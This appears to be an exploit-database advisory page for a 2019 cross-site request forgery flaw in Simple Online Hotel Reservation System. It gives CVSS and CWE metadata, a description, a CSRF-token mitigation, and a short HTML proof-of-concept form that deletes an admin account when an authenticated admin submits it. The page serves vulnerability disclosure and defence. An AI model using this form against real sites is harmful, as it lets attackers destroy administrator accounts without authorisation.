header-logo
Suggest Exploit
vendor:
Simple Online Hotel Reservation System
by:
Mr Winst0n
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Simple Online Hotel Reservation System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux, Windows 8.1
2019

Simple Online Hotel Reservation System – Cross-Site Request Forgery (Delete Admin)

A Cross-Site Request Forgery (CSRF) vulnerability exists in Simple Online Hotel Reservation System, which allows an attacker to delete an admin account by sending a malicious request. An attacker can craft a malicious HTML page containing a form with the action attribute set to delete_account.php?admin_id=1, which when visited by an authenticated admin, will delete the admin account.

Mitigation:

Implementing a CSRF token in the form to verify the authenticity of the request.
Source

Exploit-DB raw data:

# Exploit Title: Simple Online Hotel Reservation System  - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1 

# PoC:

<html>
<head>
	<title>Delete Admin</title>
</head>
<body>
	<form method = "POST" action="http://localhost/[PATH]/admin/delete_account.php?admin_id=1"> 
		<!-- You can change admin_id -->
		<button>Delete</button>
	</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR